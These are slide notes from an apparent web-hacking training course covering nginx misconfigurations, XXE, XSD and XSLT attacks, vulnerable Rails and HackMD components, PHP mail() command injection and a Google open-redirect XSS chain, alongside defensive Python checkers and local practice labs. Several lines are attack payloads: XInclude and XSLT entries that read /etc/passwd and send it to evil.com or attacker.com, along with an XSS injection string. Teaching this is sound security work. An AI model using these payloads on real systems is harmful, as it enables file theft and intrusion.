Insecure design is not the source for all other Top 10 risk categories. There is a difference between insecure design and insecure implementation.
One of the factors that contribute to insecure design is the lack of business risk profiling inherent in the software or system being developed, and thus the failure to determine what level of security design is required.
Attacker accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.
Security researchers from HackenProof, while performing a routine security audit via Shodan, found that three IPs running Elasticsearch clusters were exposing nearly 73 GB of sensitive information to the Internet.
Misconfiguration
Nginx - Case 1
It is common to use variables such as $uri, $document_uri, and $request_uri to redirect users somewhere
What would then happen?
CRLF Injection
Cont.
Why does $uri cause CRLF Injection?
$uri and $document_uri are URL-decoded strings
$request_uri is the original, still-encoded string
Therefore, an implicit newline character (from an encoded %0d%0a in the request) may exist when you use the variables $uri and $document_uri
Nginx - Case 2
What would then happen?
Any response packet from /test2 will have no CSP header, thus no CSP protection
Cont.
Why? That’s because add_header directives are inherited from the previous level if and only if there are no add_header directives defined on the current level
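An added example, not part of the slides, that turns both nginx cases into a small Python checker in the spirit of gixy: it scans a constructed config for redirects built from the URL-decoded $uri/$document_uri (Case 1) and for a location whose own add_header drops the server-level CSP (Case 2). The config, the function names and the finding format are my own construction.

```python
import re
from typing import List, Tuple

# Constructed nginx config reproducing both slide cases: a redirect built from
# the URL-decoded $uri (Case 1) and a location whose own add_header makes nginx
# stop inheriting the server-level CSP header (Case 2). /safe is the fixed form.
SAMPLE_CONF = """
server {
    listen 80;
    add_header Content-Security-Policy "default-src 'self'";

    location /redirect {
        return 302 https://example.com$uri;
    }
    location /test2 {
        add_header X-Frame-Options DENY;
    }
    location /safe {
        return 302 https://example.com$request_uri;
    }
}
"""

# $uri and $document_uri are URL-decoded, so %0d%0a in the request becomes a
# real CRLF inside the Location header; $request_uri keeps the raw encoding.
DECODED_VARS = re.compile(r"\$(?:uri|document_uri)\b")


def audit_nginx(conf: str) -> List[Tuple[str, str]]:
    """Return (kind, detail) findings; a toy version of the checks gixy runs."""
    findings = []
    stack = []  # one (block name, headers added at that level) per open block
    for lineno, raw in enumerate(conf.splitlines(), 1):
        line = raw.strip()
        if line.endswith("{"):
            stack.append((line[:-1].strip(), set()))
        elif line == "}":
            name, own = stack.pop()
            # nginx inherits add_header only from the nearest level that has
            # any; once a block declares its own, every parent header is gone.
            parent = next((p for p in reversed(stack) if p[1]), None)
            if own and parent:
                for lost in sorted(parent[1] - own):
                    findings.append(("header-override",
                                     f"{name}: own add_header drops '{lost}' set in {parent[0]}"))
        elif line.startswith(("return", "rewrite")) and DECODED_VARS.search(line):
            findings.append(("crlf", f"line {lineno}: {line} (use $request_uri)"))
        elif line.startswith("add_header"):
            stack[-1][1].add(line.split()[1])
    return findings
```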
XXE (XML eXternal Entity attack) is an attack in which XML input containing a reference to an external entity is processed by a weakly configured XML parser
It can lead to disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts
XXE targets
Web servers (even in deep backend)
XML-based documents: docx, pptx, odt, etc. (tools exist, e.g. oxml_xxe; see also Microsoft Office XXE)
For Open XML formats, the [Content_Types].xml file is the better target for XXE injections.
Databases (MySQL, PostgreSQL, …)
XMP (Extensible Metadata Platform) in images (gif, png, jpg, …)
Web browsers
…
Exploitation
In-band: output data in XML is returned to the user
OOB - Out-Of-Band (send sensitive data with external entity request)
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend</body></note>
Cont.
Attributes
<?xml version="1.0" standalone="yes"?>
The XML standalone attribute signals to the XML processor that the DTD is used only for validation (use of external entities is forbidden). The default value is no, which suits the attacker, although some parsers ignore this option.
XML entities types
General entities: used in XML content like `&name;`
<!ENTITY name "Hello World">
Parameter entities: used inside the doctype definition like `%name;`
<!ENTITY % name "Hello World">
<!-- parameter entities can insert new entities -->
<!ENTITY % name "Hello %myEntity;">
Cont.
External entities: entities that reference an external resource (one not declared in the current XML document); both general entities and parameter entities can be external
<!ENTITY name SYSTEM "URI/URL">
<!ENTITY name PUBLIC "any_text" "URI/URL">
<!-- External entities can be used for doctypes too -->
<!DOCTYPE name SYSTEM "address.dtd" [...]>
<!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">
Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover
Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts
Rails is a software library that extends the Ruby programming language. It’s often promoted as an MVC web framework, which stands for Model, View, and Controller respectively
De facto, web developers are attracted by its simplicity and the principle of Convention over Configuration, and it has become more popular in recent days
active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15, 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code
Or, cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion
Cont.
Remote Code Execution Vulnerability
Due to the support of parsing yaml in XML parser, we can craft a special XML payload to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application
Cont.
After Rails 3, parsing of nodes with the yaml type has been disallowed by default
lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
Cont.
Remote Code Execution Vulnerability
Before Rails 3.0.19, the default decoder used by default JSON parser is YAML
The /api/v1/photoproxy server-side handler fetches a URL passed in a parameter and proxies the HTTP response
url := r.FormValue("url")
if !strings.HasPrefix(url, "https://picasaweb.google.com/data/feed/api") {
	writeJSONError(c, w, http.StatusBadRequest, "url parameter is missing or is an invalid endpoint")
	return
}
Hence, if we want to trigger an XSS, we must find a cross-domain redirect endpoint that exists on https://picasaweb.google.com
Step 2
Although a known redirect endpoint, https://picasaweb.google.com/bye?continue=, exists, there is another restriction: the redirect taken from the continue parameter value is not fully open, as it must point to one of the Google domains (e.g. www.google.com)
In order to serve arbitrary content, Tomasz needed to find an open redirect on www.google.com and chain it
However, the server's request handler specifies an application/json Content-Type, which stops modern browsers from interpreting the response as HTML
Code Snippet
func servePhotosProxy(w http.ResponseWriter, r *http.Request) {
	c := newContext(r)
	if r.Method != "GET" {
		writeJSONError(c, w, http.StatusBadRequest, "invalid request method")
		return
	}
	url := r.FormValue("url")
	if !strings.HasPrefix(url, "https://picasaweb.google.com/data/feed/api") {
		writeJSONError(c, w, http.StatusBadRequest, "url parameter is missing or is an invalid endpoint")
		return
	}
	req, err := http.NewRequest("GET", url, nil)
	if err != nil {
		writeJSONError(c, w, errStatus(err), err)
		return
	}
	res, err := httpClient(c).Do(req)
	if err != nil {
		writeJSONError(c, w, errStatus(err), err)
		return
	}
	defer res.Body.Close()
	w.Header().Set("Content-Type", "application/json;charset=utf-8")
	w.WriteHeader(res.StatusCode)
	io.Copy(w, res.Body)
}
Cont.
Tomasz found a clever trick to bypass this control. You’ll notice that the Content-Type header is only emitted when the response is successfully fetched
In the event of an error, the writeJSONError function is called instead
Step 4
Response
{"error":"Get http://woops-pocs.appspot.com: failed to parse Location header \"//><img src=x onerror='alert(document.domain)'\": parse //><img src=x onerror='alert(document.domain)': invalid character \" \" in host name"}
What can we learn from this case?
The workarounds we implement can sometimes introduce problems of their own
How to patch?
Discussion…
Ensure that the function emits the correct Content-Type, such as the application/json header in this case
Practical Web Hacking and Exploitation
Part 2
A4 Insecure Design
Introduction
Real Case 1 - Cool Pets NFT
Cool Pets, a spin-off of Cool Cats, implemented a Captcha check during its public mint to prevent bots from minting, but because the challenge was not generated randomly, one verification code could be locked in ahead of time and reused.
Real Case 2 - 10 minutes of chat for 50 dollars / HowFun
A5 Security Misconfiguration
Introduction
Common Pitfalls
Default Account and Password
https://cirt.net/passwords
Real Case 1 - Worse than Equifax: Personal records of 340M people leaked online
Exactis, a market research company based in Florida, exposed the sensitive information of nearly 340 million US citizens.
Real Case 2 - Private data of more than 82 million US citizens left exposed
gixy - Nginx configuration static analyzer
Version Control
Security Issue
When hackers discover…
Cont.
Intro to Git
Tool
Practice 1
http://127.0.0.1:8094/phpinfo.php
Practice 2
http://127.0.0.1:8095/?name=boik
Cont.
Hint:
Introduction to XXE
XXE targets
Exploitation
Terminology
DTD - Document Type Definition
Cont.
Attributes
XML entities types
Attack Vectors
Say, we have following vulnerable code:
Vulnerable Code
Local File Inclusion
Exploit
Cont.
SSRF
Exploit
Cont.
OOB (Out-of-Band)
When we get no output back, we can use OOB to retrieve the data through a server we control.
Caution: In the internal DTD subset, parameter-entity references MUST NOT occur within markup declarations.
Ref: https://www.w3.org/TR/xml/#wfc-PEinInternalSubset
Exploit
http://192.168.10.150:8000/evil.dtd
Cont.
DoS
Exploit
Exploit 2
Error based
Case 1
Exploit
http://192.168.10.150:8000/evil.dtd
Cont.
Case 2
Exploit
http://192.168.10.150:8000/evil.dtd
Cont.
Mitigation
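An added example, not from the slides, of the mitigation using Python's standard-library xml.sax: the same document is parsed once with external general entities enabled (the weak configuration behind the local file read shown above) and once with them disabled, together with a pre-check that rejects any document carrying a DTD, which also stops the entity-expansion DoS and parameter-entity OOB cases. The secret file, the document and all function names are my own construction.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def has_dtd(xml_bytes: bytes) -> bool:
    """Pre-check: a DTD is what defines entities, so rejecting any document
    that carries one also blocks the entity-expansion DoS and parameter-entity
    OOB cases. Byte-level only, so treat it as defense in depth."""
    return b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes


def parse_document(xml_bytes: bytes, allow_external_entities: bool) -> str:
    """Parse with xml.sax and return the text the parser produced; the flag
    switches between the weak and the hardened parser configuration."""
    parser = xml.sax.make_parser()
    collector = TextCollector()
    parser.setContentHandler(collector)
    # feature_external_ges: fetch external general entities (file, http, ...).
    # Python >= 3.7.1 defaults it to False; older versions fetched them.
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo():
    """Constructed secret file standing in for /etc/passwd in the slides."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write("db_password=hunter2")
    # Absolute path as the SYSTEM literal; the parser treats it like file://
    doc = ('<?xml version="1.0"?>\n'
           f'<!DOCTYPE note [ <!ENTITY xxe SYSTEM "{path}"> ]>\n'
           "<note><body>&xxe;</body></note>").encode()
    try:
        weak = parse_document(doc, allow_external_entities=True)
        hardened = parse_document(doc, allow_external_entities=False)
    finally:
        os.unlink(path)
    return weak, hardened, has_dtd(doc)
```

With the weak setting the body text becomes the file content; with the hardened setting the entity is skipped and the body stays empty.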
XSD Attack
XML Schema Definition Language (XSD) is used to define XML structure.
Attack Vectors
OOB: schemaLocation
<document xmlns="http://any.namespace.name/like.url" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://any.namespace.name/like.url http://attacker.com/evil.xsd">text</document>
OOB: noNamespaceSchemaLocation
<document xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://attacker.com/evil.xsd">text</document>
OOB: XInclude
<data xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="http://attacker.com/evil.xml"/>
  <xi:include href="file:///etc/passwd" parse="text"/>
</data>
Error based
<xs:restriction base="xs:string">
  <xs:pattern value="&xxe;" />
</xs:restriction>
XSLT Attack
eXtensible Stylesheet Language Transformations (XSLT) is used to convert one XML document into another.
Attack Vectors
Getting system information
<xsl:template match="/">
  XSLT Version: <xsl:value-of select="system-property('xsl:version')" />
  XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
  XSLT Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
</xsl:template>
OOB: xml-stylesheet
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="http://evil.com/evil.xsl"?>
<doc></doc>
XSLT Out-Of-Band through variables and value-of definition
<xsl:value-of select="document('test.html')" />
<xsl:value-of select="document('http://dev.company.com/secret.txt')" />
<xsl:variable name="name1" select="document('file:///etc/passwd')" />
<xsl:variable name="name2" select="concat('http://evil.com/?', $name1)" />
<xsl:variable name="name3" select="document($name2)" />
Practice 3
http://127.0.0.1:8096/?feed=http://feeds.bbci.co.uk/news/rss.xml?edition=int
Practice 4
http://127.0.0.1:8097/?feed=http://feeds.bbci.co.uk/news/rss.xml?edition=int
Practice 5
http://127.0.0.1:8098/
A6 Vulnerable and Outdated Components
Introduction
HackMD
HackMD - Part.1 (fixed)
HackMD's slide mode has a Stored XSS; the problematic code is here:
Vulnerable Code
Exploit
Response
HackMD - Part.2 (fixed)
HackMD's metadata handling has a Stored XSS; the problematic code is here:
Vulnerable Code
Exploit
Exploit
HackMD - Part.3 (fixed)
Even after the patch, HackMD's metadata handling still has a Stored XSS; the problematic code is here:
Vulnerable Code
Exploit
HackMD - Part.4 (fixed recently, commit: 93b9116)
What can we learn from this case?
How to patch?
Discussion…
JavaScript frameworks
AngularJS
A walkthrough of escaping AngularJS's sandbox utility.
ReactJS
case study: XSS via a spoofed React element
ReactJS gives you more protection with this PR.
Rails
CVE-2013-0156
Cont.
Cont.
DISALLOWED_TYPES = %w(symbol yaml)

def initialize(xml, disallowed_types = nil)
  @xml = normalize_keys(XmlMini.parse(xml))
  @disallowed_types = disallowed_types || DISALLOWED_TYPES
end
CVE-2013-0333
Cont.
Third Parties
bootstrap-sass Ruby Gem
Practice 1
http://127.0.0.1:8099/
Cont.
Hint:
PHP’s mail() function
synopsis
Vulnerable Code
What can be wrong?
http://php.net/manual/en/function.mail.php
Function [ <internal:standard> function mail ] {
  - Parameters [5] {
    Parameter #0 [ <required> $to ]
    Parameter #1 [ <required> $subject ]
    Parameter #2 [ <required> $message ]
    Parameter #3 [ <optional> $additional_headers ]
    Parameter #4 [ <optional> $additional_parameters ]
  }
}
Cont.
Say we have the following snippet:
$to = "john@localhost";
$subject = "Simple Email";
$headers = "From: mike@localhost";
$body = 'Body of the message';
$sender = "admin@localhost";
mail($to, $subject, $body, $headers, "-f $sender");
Cont.
Following request will be made:
Cont.
And pass the following data to its STDIN:
Arbitrary Command Injection
Cont.
Remote Code Execution
Vulnerable Code
Cont.
$_GET['from']
Cont.
Proof of Concept
Cont.
/var/www/html/rce.php
Practice 2
http://127.0.0.1:8100/
Hint:
Practice 3
http://127.0.0.1:8101/
Hint:
Appendix
Unvalidated Redirects and Forwards
Introduction
Real Case - Open redirects that matter
Tomasz Bojarski, coming from a little town in Poland, used not one, but two redirects to trigger an XSS on events.google.com.
Proof of Concept
Step 1
Step 2
Step 3
https://www.google.com/amp/<url-without-the-protocol>
Final PoC
Cont.
Code Snippet
Cont.
Step 4
Response
What can we learn from this case?
How to patch?
Discussion…
References
Cont.
Thank you
boik.su@cycarrier.com